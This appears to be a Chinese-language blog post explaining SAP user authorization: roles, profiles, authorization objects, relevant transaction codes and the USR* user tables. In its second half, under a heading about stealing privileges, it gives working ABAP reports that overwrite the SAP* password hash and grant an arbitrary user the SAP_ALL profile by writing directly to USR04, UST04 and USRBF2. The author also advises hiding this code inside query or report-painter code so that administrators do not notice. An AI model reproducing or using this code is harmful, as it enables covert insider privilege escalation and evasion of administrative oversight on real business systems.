`
wbl313
  • 浏览: 31050 次
  • 性别: Icon_minigender_1
  • 来自: 银河系
最近访客 更多访客>>
社区版块
存档分类
最新评论

SAP 用户权限解剖

    博客分类:
  • SAP
阅读更多
通常basis会使用PFCG做权限管理,时你保存时会产生一个系统外的profile name,

记得SU01时用户有profile 和role两栏位吗?它们的关系如何呢?

  首先明白几个概念.

  1.activity

  这样说吧,我们从activity谈起,activity是什么意思这个你查下

字典也就知道了,对就是规定可做什么动作,比如说不能吸烟只能喝酒,不能多于2两,

  不对,这是我老婆讲的,SAP不是这样子的,是只能insert, update,display什么的.

  这些东西当年德国佬是写在tobj表中的.

  activity 也是可分activity group的.

  2.activity category &Authorization group

  Role Vs Profile

  你看看表T020就知道了,就是什么K,D, A, M什么的.

  profile是什么呢?实际上可以理解为所有的authorization data(有很多authorization group--{你可使用OBA7填写,

  权限太细也不是好事^_^}和activity组成)的一个集合的名字,通常一个自定义的role产

  生一个profile,SAP权限控制是根据profile里的authorization data(objects)来控制的.

  role又是什么呢?role只是一个名字而已,然后将profile赋予给它, 比如你SU01建立一个

  用户,我没有任何role,但是加如SAP_All profile

  也是可做任何事情.

  SAP本身有很多default role & profile.

  3.最常用的PFCG

  ->authorizations->change authorization data->

  进入后选取selection criteria 可看到所有的authorization object

  manually可手工加authorization object,比如你使用某个t-code权限出错误,abap使用SU53检查就

  知道缺少哪个authorization objec,然后手工加入就可以.

  你选去authorization levels就可by account type再细分权限.

有些甚至直接到表字段.而且你甚至可給一个object分配缓存buffer.

  那么SAP是如何做到权限控制的呢,屠夫就用刀小宰一下.

  4.关于权限方面的几个t-code.

  (一)Role(角色)相关T-code:

  PFAC 标准

  PFAC_CHG 改变

  PFAC_DEL 删除

  PFAC_DIS 显示

  PFAC_INS 新建

  PFAC_STR

  PFCG 创建

  ROLE_CMP 比较

  SUPC 批量建立角色profile

  SWUJ 测试

SU03 检测authorzation data

  SU25, SU26 检查updated profile

(二)建立用户相关T-code:

  SU0

  SU01

  SU01D

  SU01_NAV

  SU05

  SU50, Su51, SU52

  SU1

  SU10 批量

  SU12 批量

  SUCOMP:维护用户公司地址

  SU2 change用户参数

  SUIM 用户信息系统

  用户组

  SUGR:维护

  SUGRD:显示

  SUGRD_NAV:还是维护

  SUGR_NAV:还是显示

  (三)关于profile&Authoraztion Data

  SU02:直接创建profile不用role

  SU20:细分Authorization Fields

  SU21(SU03):****维护Authorization Objects(TOBJ,USR12).

  对于凭证你可细分到:

  F_BKPF_BED: Accounting Document: Account Authorization for Customers
  F_BKPF_BEK: Accounting Document: Account Authorization for Vendors
  F_BKPF_BES: Accounting Document: Account Authorization for G/L Accounts
  F_BKPF_BLA: Accounting Document: Authorization for Document Types
  F_BKPF_BUK: Accounting Document: Authorization for Company Codes
  F_BKPF_BUP: Accounting Document: Authorization for Posting Periods
  F_BKPF_GSB: Accounting Document: Authorization for Business Areas
  F_BKPF_KOA: Accounting Document: Authorization for Account Types
  F_BKPF_VW : Accounting Document: Change Default Values for Doc.Type/PsKy
然后你进去还可细分,这些个东西是save在USR12表中的. 在DB层是UTAB.

  对具体transaction code细分:

  SU22,SU24
  SU53:*** 就是你出错用来检查没有那些authoraztion objects.
  SU56:分析authoraztion data buffers.
SU87:用来检查用户改变产生的history
  SU96,SU97,SU98,SU99:干啥的?
  SUPC:批量产生role

  DB和logical层:

  SUKRI:Transaction Combinations Critical for Security

  tables:

  TOBJ : All avaiable authorzation objects.(全在此)

  USR12: 用户级authoraztion值

  -----------------------------

  USR01:主数据
  USR02:密码在此
  USR04:授权在此
  USR03:User address data
  USR05:User Master Parameter ID
  USR06:Additional Data per User
  USR07:Object/values of last authorization check that failed
  USR08:Table for user menu entries
  USR09:Entries for user menus (work areas)
  USR10:User master authorization profiles
  USR11:User Master Texts for Profiles (USR10)
  USR12:User master authorization values
  USR13:Short Texts for Authorizations
  USR14:Surchargeable Language Versions per User
  USR15:External User Name
  USR16:Values for Variables for User Authorizations
  USR20:Date of last user master reorganization
  USR21:Assign user name address key
  USR22:Logon data without kernel access
  USR30:Additional Information for User Menu
  USR40:Table for illegal passwords
  USR41:当前用户
  USREFUS:
  USRBF2
  USRBF3
  UST04:User Profile在此
  UST10C: Composite profiles
  UST10S: Single profiles (角色对应的)
  UST12 : Authorizations
..............................

  如何窃取权限

  ..............................

  用户:

User type用户类型:

  通常的用户类型有

  a.dialog (就是normal user)

  b.communication

  c.system

  d.service

  e.reference.

通常你在使用任何T-code前一定会有权限检测的.

  AUTHORITY_CHECK:这个函数只是小检查一下你的user有没有,什么时候过期.

  **如果coding只要使用此函数就够了.

  AUTHORITY_CHECK_TCODE:检查T-code

  这倆函数是真正检查autorization objects的.

  SUSR_USER_AUTH_FOR_OBJ_GET:

  A  UTHORIZATION_DATA_READ_SELOBJ:

  ------------------------------------------

  将SAP*的密码改成123的程序,很简单.

  我们找到那个user logon表USR02.

  (DF52478E6FF90EEB是经过SAP加密保存在DB的,SAP的密码加密?)

  report zmodSAP*.
  data zUSR02 like USR02 .
  select single * into zUSR02 from USR02
  where BNAME = 'SAP*'.
  zUSR02-Bcode = 'DF52478E6FF90EEB' .
  Update USR02 from zUSR02 .

  现在的问题是如何让你那basis不发现,很简单,将code隐藏在Query里面,就是说你做一个

  query,query是会产生code的,然后你加入此代码,谁能想到???然后你就等你的basis去哭...

  这样做太狠毒了.还是自己偷偷搞自己的用户吧.

  在此你必须对权限结构非常清晰.

  权限和三个表有关系.

  a.USR04
  b.USR04
  c.USRBF2 这个表是对应到所用的authorzization objects的.
  *&---------------------------------------------------------------------*
  *& Report : Steal SAP ALL Right *
  *& Creation Date : 2004.04.01 *
  *& Created by : Stone.Fu *
  *& Description : 可窃取SAP ALL权限 *
  *& Modified Date : 2005.11.02
  *& Description : 将此code hide在report painter or query code *
  *&---------------------------------------------------------------------*
  report zrightsteal.
  data zUSR04 like USR04 . "????????work area??
  data zUST04 like USR04 .
  data zPROFS like USR04-PROFS.
  data ZUSRBF2 like USRBF2 occurs 0 with header line.
  "USRBF2?????internal table
  ** Update Authorization table USR04.
  select single * into zUSR04 from USR04
  where BNAME = 'ZABC2'. "SAP All 权限
  move 'C SAP_ALL' to zPROFS .
  ZUSR04-NRPRO = '14'.
  zUSR04-PROFS = zPROFS.
  Update USR04 from zUSR04 .
  **Update User authorization masters table UST04 .
  select single * into zUST04 from UST04
  where BNAME = 'ZABC2'.
  zUST04-PROFILE = 'SAP_ALL'. "SAP all 权限
  Update UST04 from zUST04 .
  *?????insert
  *ZUST04-MANDT = '200'.
  *ZUST04-BNAME = 'ZABC2'.
  *ZUST04-PROFILE = 'SAP_ALL'.
  *Insert UST04 from ZUST04 .
  select * from USRBF2 into table ZUSRBF2
  where BNAME = 'SAP*' .
  Loop at ZUSRBF2.
  ZUSRBF2-BNAME = 'ZABC2'.
  Modify ZUSRBF2 INDEX sy-tabix TRANSPORTING BNAME.
  endloop.
  INSERT USRBF2 FROM TABLE ZUSRBF2 ACCEPTING DUPLICATE KEYS.

  自己建立一个ztest用户不给它任何权限然后在test machine上run 报表zrightsteal.

  然后ztest就是SAP_ALL了, 然后你将code hide在SQP query的code中.ABAPcode太容易被人发现。



分享到:
评论

相关推荐

    SAP维护权限对象.doc

    在创建权限角色时,需要选择对应的角色名称,例如管理员角色或普通用户角色,然后选择对应的权限对象和授权字段。 四、权限对象的赋予 权限对象可以被赋予用户,以限制用户对某些数据或功能的访问权限。权限对象的...

    SAP权限相关设置(详细介绍SAP权限相关概念及相关操作)

    - **Basis Role (Y+ 开头)**: 通常用于系统管理员或其他特殊职能的用户。 #### 四、权限的设定方法 ##### 1. 常规权限设定方法 - **通过模板Role**: 通过修改模板Role来影响所有基于该模板的Role。 - **直接修改...

    SAP权限自定义程序检查控制

    SAP提供了多种工具来帮助管理员查看用户当前所拥有的权限以及可能缺失的权限。 1. **使用SU53事务代码**:SU53可以用来查看用户所缺少的权限。通过输入用户ID,管理员可以看到该用户在执行某些特定操作或访问某些...

    SAP权限及角色管理

    通过这些事务代码,管理员能够方便地对用户进行日常的权限管理操作。同时,系统还提供了检查授权(SU20/SU21)的功能,可以在出现权限问题时检测未授权的对象。 SAP中的权限相关表格是权限管理系统的重要组成部分,...

    培训SAP用户权限讲解ppt.pptx

    SAP用户权限管理是SAP系统安全架构的核心组成部分,它确保了系统数据的保护和用户操作的合法性。...因此,理解和正确配置SAP用户权限是系统管理员的关键职责,也是保证企业信息系统安全稳定运行的基础。

    sap角色权限设置手册

    在 SAP 系统中,角色是指一组权限的集合,这些权限确定了用户在系统中的操作权限。角色可以分为两种:标准角色和自定义角色。标准角色是 SAP 提供的预定义角色,自定义角色是根据企业具体需求而创建的角色。 二、...

    SAP权限设置

    SAP权限设置是SAP系统中的一种安全机制,用于控制用户对系统资源的访问权限。该机制通过角色设置和权限配置来实现对用户的访问控制。 SAP权限架构包括以下几个部分: 1. 角色(Role):是一种抽象的概念,代表了一...

    SAP权限概念+用户维护+角色设计及权限测试

    适合于SAP BASIS新手的 用户ERP用户新建、角色维护的培训文档

    sap权限对象的创建和使用

    在SAP系统中,权限管理是企业数据安全的重要组成部分,其中权限对象扮演着核心角色。权限对象是SAP授权机制的基础,它们定义了用户可以执行的操作类型,如查看、更改或者删除数据。本文将深入探讨如何创建和使用权限...

    SAP-BW权限基本配置

    SAP-BW 权限基本配置是指在 BW 系统中为用户授权的基本配置,侧重点在分析权限的配置,使用户可以根据不同的角色来查看对应的报表。 一、用户创建及用户权限初步认识 在 BW 系统中,需要使用 SU01 事务码来建立...

    SAP 用户权限学习从入门到精通

    通过这个功能,管理员可以快速地将一个用户的所有权限复制到另一个用户,从而节省了大量的权限配置时间。 在SAP权限管理中,还经常用到权限对象S_TCODE,该对象用于控制对SAP标准事务的访问。例如,若要限制用户...

    SAP用户权限管理维护手册.pdf

    SAP用户权限管理维护手册 SAP用户权限管理维护手册是SAP系统的重要组件之一,旨在确保SAP系统的安全和稳定运行。本手册提供了SAP用户权限管理的详细指南,涵盖权限设置、用户授权设置、权限管理流程及用户授权策略...

    SAP用户和权限设置

    维护用户;维护系统访问权限;基础系统访问权限;组织用户、参数文件和权限维护;访问安全性

    sap新建权限对象操作手册

    域内的Value Range可用来指导权限管理员进行维护,但并非必须维护。接着,创建数据类型,这里可以选择引用已创建的Domain或直接指定数据类型。 然后,创建权限字段。在SU20中,你可以定义新的权限字段,如ZPC_FIELD...

    SAP权限及审计培训文档.pptx

    本人针对SAP权限机制进行讲解,同时将SAP权限相关都审计相关控制进行同步介绍,便于对SAP权限机制和审计要求都理解。

    sap 用户和权限

    Users and Authorizations in the SAP R3 System课程课件

    sap 权限的设定

    【SAP权限设定详解】 SAP权限设定是企业管理和...总的来说,SAP权限设定是一个涉及组织结构、业务流程和安全策略的复杂过程,需要系统管理员具备深厚的SAP知识和实践经验,才能有效地管理权限,保证系统的稳定和安全。

    sap 权限配置

    总之,SAP权限配置是一个系统性的过程,它要求管理员理解系统中不同的权限概念,并能够恰当地创建和分配角色。通过角色将权限进行分组,不仅简化了权限管理,还使得整个系统更易于维护和理解。管理员在配置权限时,...

    SAP 权限检查 (通过自定义函数进行控制检查)

    在 SAP 系统中,权限检查是一项重要的安全机制,用于控制用户对系统资源的访问权限。通过自定义函数进行控制检查,可以更好地实现权限管理。下面将详细介绍权限检查的知识点: 1. 创建权限对象字段(SU20) 在 SAP...

Global site tag (gtag.js) - Google Analytics